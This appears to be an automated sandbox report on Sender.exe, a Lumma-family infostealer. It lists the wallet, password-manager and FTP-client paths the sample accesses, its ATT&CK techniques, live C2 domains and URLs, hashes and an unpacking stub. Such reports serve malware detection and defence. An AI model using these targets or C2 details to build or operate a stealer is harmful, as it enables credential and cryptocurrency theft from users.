Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Roaming\FTPRush
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\ProgramData\SiteDesigner\3D-FTP
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Roaming\Armory
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Roaming\DashCore\wallets
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Roaming\WalletWasabi\Client\Wallets
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Roaming\Daedalus Mainnet\wallets
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Roaming\Bitwarden
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Roaming\NordPass
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Local\1Password
Source: C:\Users\user\Desktop\Sender.exe | Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Desktop\Sender.exe | Directory queried: C:\Users\user\Documents\EIVQSAOTAQ
Source: C:\Users\user\Desktop\Sender.exe | Directory queried: C:\Users\user\Documents\JDDHMPCDUJ
Source: C:\Users\user\Desktop\Sender.exe | Directory queried: C:\Users\user\Documents\LIJDSFKJZG
Source: C:\Users\user\Desktop\Sender.exe | Directory queried: C:\Users\user\Documents\QCOILOQIKC
Source: C:\Users\user\Desktop\Sender.exe | Directory queried: C:\Users\user\Documents\UNKRLCVOHV
Source: C:\Users\user\Desktop\Sender.exe | Directory queried: C:\Users\user\Documents\ZGGKNSUKOP
      Source: C:\Users\user\Desktop\Sender.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZGJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKCJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeDirectory queried: C:\Users\user\Documents\EIVQSAOTAQJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZGJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeDirectory queried: C:\Users\user\Documents\UNKRLCVOHVJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeDirectory queried: C:\Users\user\Documents\EIVQSAOTAQJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZGJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKCJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeDirectory queried: C:\Users\user\Documents\UNKRLCVOHVJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZGJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKCJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeDirectory queried: C:\Users\user\Documents\UNKRLCVOHVJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeDirectory queried: C:\Users\user\Documents\EIVQSAOTAQJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZGJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeDirectory queried: C:\Users\user\DocumentsJump to behavior

      Remote Access Functionality

Source: Yara match | File source: 0.2.Sender.exe.a00000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1292268043.0000000000A01000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
MITRE ATT&CK Matrix (techniques listed per tactic; a leading number is the report's hit count for that technique)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts
Execution: 12 Windows Management Instrumentation; Scheduled Task/Job; At; Cron; Launchd
Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script
Privilege Escalation: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script
Defense Evasion: 21 Virtualization/Sandbox Evasion; 11 Obfuscated Files or Information; 11 Software Packing; 1 DLL Side-Loading; Software Packing
Credential Access: 3 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets
Discovery: 221 Security Software Discovery; 21 Virtualization/Sandbox Evasion; 1 Process Discovery; 1 File and Directory Discovery; 22 System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH
Collection: 1 Archive Collected Data; 41 Data from Local System; Data from Network Shared Drive; Input Capture; Keylogging
Command and Control: 11 Encrypted Channel; 2 Non-Application Layer Protocol; 113 Application Layer Protocol; Protocol Impersonation; Fallback Channels
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact
Behavior Graph
ID: 1675540 | Sample: Sender.exe | Start date: 27/04/2025 | Architecture: WINDOWS | Score: 100
Root signatures: Suricata IDS alerts for network traffic; Found malware configuration; Antivirus detection for URL or domain; 5 other signatures
DNS: tropiscbs.live
Process started: Sender.exe
  DNS/IP: tropiscbs.live 104.21.77.203, ports 443, 49710, 49711, CLOUDFLARENETUS, United States
  Signatures: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Query firmware table information (likely to detect VMs); Tries to harvest and steal ftp login credentials; 3 other signatures

Source | Detection | Scanner | Label
Sender.exe | 71% | Virustotal |
Sender.exe | 67% | ReversingLabs | Win32.Spyware.Lummastealer
Sender.exe | 100% | Avira | TR/Crypt.XPACK.Gen
      No Antivirus matches
Source | Detection | Scanner | Label
https://tropiscbs.live:443/iuwxxD | 100% | Avira URL Cloud | malware
https://tropiscbs.live/ | 100% | Avira URL Cloud | malware
https://tropiscbs.live/PgY | 100% | Avira URL Cloud | malware
https://tropiscbs.live/iuwxx | 100% | Avira URL Cloud | malware
https://tropiscbs.live//gV | 100% | Avira URL Cloud | malware
https://tropiscbs.live/hg | 100% | Avira URL Cloud | malware
https://tropiscbs.live:443/iuwxx | 100% | Avira URL Cloud | malware
https://tropiscbs.live/iuwxxoY | 100% | Avira URL Cloud | malware
https://tropiscbs.live:443/iuwxxbcryptPrimitives.dll | 100% | Avira URL Cloud | malware
https://tropiscbs.live/iuwxxuu | 100% | Avira URL Cloud | malware
https://tropiscbs.live/=gD | 100% | Avira URL Cloud | malware


Name | IP | Active | Malicious | Antivirus Detection | Reputation
tropiscbs.live | 104.21.77.203 | true | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
climatologfy.top/kbud | false | | high
https://tropiscbs.live/iuwxx | true | Avira URL Cloud: malware | unknown
vigorbridgoe.top/banb | false | | high
cartograhphy.top/ixau | false | | high
woodpeckersd.run/glsk | false | | high
geographys.run/eirq | false | | high
biosphxere.digital/tqoa | false | | high
tropiscbs.live/iuwxx | false | | high
topographky.top/xlak | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://tropiscbs.live:443/iuwxxD | Sender.exe, 00000000.00000002.1291751130.000000000064E000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1290555834.000000000064E000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1244133244.000000000064E000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1278704674.000000000064E000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1172718970.000000000064E000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1232012397.000000000064E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://duckduckgo.com/ac/?q= | Sender.exe, 00000000.00000003.1178836756.0000000002F78000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://tropiscbs.live/PgY | Sender.exe, 00000000.00000003.1251834541.00000000006CB000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1290417095.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000002.1291970435.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1278664144.00000000006D8000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg | Sender.exe, 00000000.00000003.1208872584.0000000000707000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417. | Sender.exe, 00000000.00000003.1208872584.0000000000707000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | Sender.exe, 00000000.00000003.1178836756.0000000002F78000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://tropiscbs.live/hg | Sender.exe, 00000000.00000003.1290417095.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000002.1291970435.00000000006DD000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://crl.rootca1.amazontrust.com/rootca1.crl0 | Sender.exe, 00000000.00000003.1207327540.0000000002FFE000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ac.ecosia.org?q= | Sender.exe, 00000000.00000003.1178836756.0000000002F78000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta | Sender.exe, 00000000.00000003.1208872584.0000000000707000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | Sender.exe, 00000000.00000003.1178836756.0000000002F78000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://ocsp.rootca1.amazontrust.com0: | Sender.exe, 00000000.00000003.1207327540.0000000002FFE000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://tropiscbs.live/ | Sender.exe, Sender.exe, 00000000.00000003.1251834541.00000000006CB000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1244298918.00000000006DC000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1172718970.0000000000657000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1290417095.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000002.1291970435.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1278664144.00000000006D8000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1232012397.0000000000657000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br | Sender.exe, 00000000.00000003.1208526403.0000000003181000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.google.com/images/branding/product/ico/googleg_alldp.ico | Sender.exe, 00000000.00000003.1178836756.0000000002F78000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://tropiscbs.live:443/iuwxxbcryptPrimitives.dll | Sender.exe, 00000000.00000002.1291751130.000000000064E000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1290555834.000000000064E000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1244133244.000000000064E000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1278704674.000000000064E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://www.ecosia.org/newtab/v20 | Sender.exe, 00000000.00000003.1178836756.0000000002F78000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://tropiscbs.live:443/iuwxx | Sender.exe, 00000000.00000002.1291751130.000000000064E000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1290555834.000000000064E000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1244133244.000000000064E000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1278704674.000000000064E000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1232012397.000000000064E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg | Sender.exe, 00000000.00000003.1208872584.0000000000707000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi | Sender.exe, 00000000.00000003.1208872584.0000000000707000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://x1.c.lencr.org/0 | Sender.exe, 00000000.00000003.1207327540.0000000002FFE000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://x1.i.lencr.org/0 | Sender.exe, 00000000.00000003.1207327540.0000000002FFE000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/chrome_newtabv20 | Sender.exe, 00000000.00000003.1178836756.0000000002F78000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://tropiscbs.live/iuwxxoY | Sender.exe, 00000000.00000003.1192811300.00000000006FD000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1192689490.00000000006F8000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1192773770.00000000006F8000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | Sender.exe, 00000000.00000003.1178836756.0000000002F78000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crt.rootca1.amazontrust.com/rootca1.cer0? | Sender.exe, 00000000.00000003.1207327540.0000000002FFE000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://tropiscbs.live/iuwxxuu | Sender.exe, 00000000.00000003.1251834541.00000000006CB000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1290417095.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000002.1291970435.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1278664144.00000000006D8000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://support.mozilla.org/products/firefoxgro.all | Sender.exe, 00000000.00000003.1208526403.0000000003181000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://tropiscbs.live//gV | Sender.exe, 00000000.00000003.1290417095.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000002.1291970435.00000000006DD000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | Sender.exe, 00000000.00000003.1178836756.0000000002F78000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://gemini.google.com/app?q= | Sender.exe, 00000000.00000003.1178836756.0000000002F78000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://tropiscbs.live/=gD | Sender.exe, 00000000.00000003.1251834541.00000000006CB000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1278664144.00000000006D8000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94 | Sender.exe, 00000000.00000003.1208872584.0000000000707000.00000004.00000020.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
104.21.77.203 | tropiscbs.live | United States | 13335 | CLOUDFLARENETUS | true
                                                                      Joe Sandbox version:42.0.0 Malachite
                                                                      Analysis ID:1675540
                                                                      Start date and time:2025-04-27 18:35:36 +02:00
                                                                      Joe Sandbox product:CloudBasic
                                                                      Overall analysis duration:0h 4m 53s
                                                                      Hypervisor based Inspection enabled:false
                                                                      Report type:full
                                                                      Cookbook file name:default.jbs
                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:10
                                                                      Number of new started drivers analysed:0
                                                                      Number of existing processes analysed:0
                                                                      Number of existing drivers analysed:0
                                                                      Number of injected processes analysed:0
                                                                      Technologies:
                                                                      • HCA enabled
                                                                      • EGA enabled
                                                                      • AMSI enabled
                                                                      Analysis Mode:default
                                                                      Analysis stop reason:Timeout
                                                                      Sample name:Sender.exe
                                                                      Detection:MAL
                                                                      Classification:mal100.troj.spyw.evad.winEXE@1/0@1/1
                                                                      EGA Information:Failed
                                                                      HCA Information:
                                                                      • Successful, ratio: 100%
                                                                      • Number of executed functions: 0
                                                                      • Number of non-executed functions: 6
                                                                      Cookbook Comments:
                                                                      • Found application associated with file extension: .exe
                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                      • Excluded IPs from analysis (whitelisted): 184.85.78.223, 4.175.87.197
                                                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, c.pki.goog, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target Sender.exe, PID 4768 because there are no executed functions
• Not all processes were analyzed, report is missing behavior information
                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
12:36:32 | API Interceptor | 6x Sleep call for process: Sender.exe modified
                                                                      No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
tropiscbs.live | random.exe | malicious | Amadey, Credential Flusher, Healer AV Disabler, LummaC Stealer | 172.67.211.127
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | XClient3.exe | malicious | XWorm | 104.22.68.199
CLOUDFLARENETUS | 250427-s7lnpawnw3.bin.exe | malicious | SilverRat | 162.159.135.232
CLOUDFLARENETUS | 250427-s7lnpawnw3.bin.exe | malicious | SilverRat | 162.159.138.232
CLOUDFLARENETUS | 250427-ryd2tassex.bin.exe | malicious | Amadey, Credential Flusher, Healer AV Disabler, LummaC Stealer | 104.21.85.126
CLOUDFLARENETUS | 250427-rzwcgsvn14.bin.exe | malicious | LummaC Stealer | 172.67.155.125
CLOUDFLARENETUS | 250427-p7bxps1sgx.bin.exe | malicious | Amadey, Credential Flusher, Healer AV Disabler, LummaC Stealer | 104.21.85.126
CLOUDFLARENETUS | 250427-p5qcba1sdw.bin.exe | malicious | Amadey, Credential Flusher, Healer AV Disabler, JasonRAT, LummaC Stealer | 172.67.205.184
CLOUDFLARENETUS | random.exe | malicious | Amadey, Credential Flusher, GhostRat, Healer AV Disabler, LummaC Stealer | 172.67.205.184
CLOUDFLARENETUS | random.exe | malicious | RHADAMANTHYS | 162.159.200.1
CLOUDFLARENETUS | random.exe | malicious | Amadey, LummaC Stealer | 104.21.85.126
Match | Associated Sample Name / URL | Detection | Threat Name | Context
104.21.77.203 | a0e9f5d64349fb13191bc781f81f42e1curriculum_vitae_actualise.vbs | malicious | Xmrig | 104.21.77.203
104.21.77.203 | 250427-tnf5jawr13.bin.exe | malicious | FloodFix, GhostRat | 104.21.77.203
104.21.77.203 | Gdrive_files__________.zip_019207.pdf | malicious | Unknown | 104.21.77.203
104.21.77.203 | 250427-s9wxfatshz.bin.exe | malicious | Unknown | 104.21.77.203
104.21.77.203 | 250427-s9wxfatshz.bin.exe | malicious | Unknown | 104.21.77.203
104.21.77.203 | 250427-rzwcgsvn14.bin.exe | malicious | LummaC Stealer | 104.21.77.203
104.21.77.203 | 250427-p7bxps1sgx.bin.exe | malicious | Amadey, Credential Flusher, Healer AV Disabler, LummaC Stealer | 104.21.77.203
104.21.77.203 | random.exe | malicious | Amadey, Credential Flusher, GhostRat, Healer AV Disabler, LummaC Stealer | 104.21.77.203
104.21.77.203 | random.exe | malicious | Amadey, LummaC Stealer | 104.21.77.203
104.21.77.203 | random.exe | malicious | Amadey, LummaC Stealer | 104.21.77.203
                                                                      No context
                                                                      No created / dropped files found
                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                      Entropy (8bit):7.9288011201939135
                                                                      TrID:
                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                      File name:Sender.exe
                                                                      File size:169'472 bytes
                                                                      MD5:39e94524e19c217d1f19208a42a12947
                                                                      SHA1:32ecfdad659adfc975c9bf3ac8f9c07d807392ac
                                                                      SHA256:4ba36a1aa022e87ce24ff7030e64e630d3652d7d5ab5ebb8368f27ebad47bcc3
                                                                      SHA512:fbfef62a5948a9a9ab0fc97ea88969376ceaf3d01976bc8996cf9d455b731c11aeb66828498be0821c0428ac6f3019d2a677f7aef70af776f46dae89b74fe7f3
                                                                      SSDEEP:3072:2MwSkCBozaSJp2Y1OMKKYgmRuD5OzC1TsaFDeZDPzz1VNfFQjA5zF6hp5kusBRiZ:2MOJpMMKPDpKWDPzzRfXpApWRpm
                                                                      TLSH:C8F31235ADB211BDE86388F0A9DE3E6C036B005829CB70ED3517A3239677B597563B12
                                                                      File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L......h.....................................@....@..........................P............@..................................@..x..
                                                                      Icon Hash:90cececece8e8eb0
                                                                      Entrypoint:0x462e80
                                                                      Entrypoint Section:UPX1
                                                                      Digitally signed:false
                                                                      Imagebase:0x400000
                                                                      Subsystem:windows gui
                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                      Time Stamp:0x680CF1FB [Sat Apr 26 14:47:23 2025 UTC]
                                                                      TLS Callbacks:
                                                                      CLR (.Net) Version:
                                                                      OS Version Major:6
                                                                      OS Version Minor:0
                                                                      File Version Major:6
                                                                      File Version Minor:0
                                                                      Subsystem Version Major:6
                                                                      Subsystem Version Minor:0
                                                                      Import Hash:42d476bd6c4e105e3a5e1538b871b450
                                                                      Instruction
                                                                      pushad
                                                                      mov esi, 0043A00Dh
                                                                      lea edi, dword ptr [esi-0003900Dh]
                                                                      push edi
                                                                      or ebp, FFFFFFFFh
                                                                      jmp 00007F662CE01FC2h
                                                                      nop
                                                                      nop
                                                                      nop
                                                                      nop
                                                                      nop
                                                                      nop
                                                                      mov al, byte ptr [esi]
                                                                      inc esi
                                                                      mov byte ptr [edi], al
                                                                      inc edi
                                                                      add ebx, ebx
                                                                      jne 00007F662CE01FB9h
                                                                      mov ebx, dword ptr [esi]
                                                                      sub esi, FFFFFFFCh
                                                                      adc ebx, ebx
                                                                      jc 00007F662CE01F9Fh
                                                                      mov eax, 00000001h
                                                                      add ebx, ebx
                                                                      jne 00007F662CE01FB9h
                                                                      mov ebx, dword ptr [esi]
                                                                      sub esi, FFFFFFFCh
                                                                      adc ebx, ebx
                                                                      adc eax, eax
                                                                      add ebx, ebx
                                                                      jnc 00007F662CE01FBDh
                                                                      jne 00007F662CE01FDAh
                                                                      mov ebx, dword ptr [esi]
                                                                      sub esi, FFFFFFFCh
                                                                      adc ebx, ebx
                                                                      jc 00007F662CE01FD1h
                                                                      dec eax
                                                                      add ebx, ebx
                                                                      jne 00007F662CE01FB9h
                                                                      mov ebx, dword ptr [esi]
                                                                      sub esi, FFFFFFFCh
                                                                      adc ebx, ebx
                                                                      adc eax, eax
                                                                      jmp 00007F662CE01F86h
                                                                      add ebx, ebx
                                                                      jne 00007F662CE01FB9h
                                                                      mov ebx, dword ptr [esi]
                                                                      sub esi, FFFFFFFCh
                                                                      adc ebx, ebx
                                                                      adc ecx, ecx
                                                                      jmp 00007F662CE02004h
                                                                      xor ecx, ecx
                                                                      sub eax, 03h
                                                                      jc 00007F662CE01FC3h
                                                                      shl eax, 08h
                                                                      mov al, byte ptr [esi]
                                                                      inc esi
                                                                      xor eax, FFFFFFFFh
                                                                      je 00007F662CE02027h
                                                                      sar eax, 1
                                                                      mov ebp, eax
                                                                      jmp 00007F662CE01FBDh
                                                                      add ebx, ebx
                                                                      jne 00007F662CE01FB9h
                                                                      mov ebx, dword ptr [esi]
                                                                      sub esi, FFFFFFFCh
                                                                      adc ebx, ebx
                                                                      jc 00007F662CE01F7Eh
                                                                      inc ecx
                                                                      add ebx, ebx
                                                                      jne 00007F662CE01FB9h
                                                                      mov ebx, dword ptr [esi]
                                                                      sub esi, FFFFFFFCh
                                                                      adc ebx, ebx
                                                                      jc 00007F662CE01F70h
                                                                      add ebx, ebx
                                                                      jne 00007F662CE01FB9h
                                                                      mov ebx, dword ptr [esi]
                                                                      sub esi, FFFFFFFCh
                                                                      adc ebx, ebx
                                                                      adc ecx, ecx
                                                                      add ebx, ebx
                                                                      jnc 00007F662CE01FA1h
                                                                      jne 00007F662CE01FBBh
                                                                      mov ebx, dword ptr [esi]
                                                                      sub esi, FFFFFFFCh
                                                                      adc ebx, ebx
                                                                      jnc 00007F662CE01F96h
                                                                      add ecx, 02h
                                                                      cmp ebp, FFFFFB00h
                                                                      adc ecx, 02h
                                                                      lea edx, dword ptr [eax+eax]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x64000 | 0x178 | UPX2
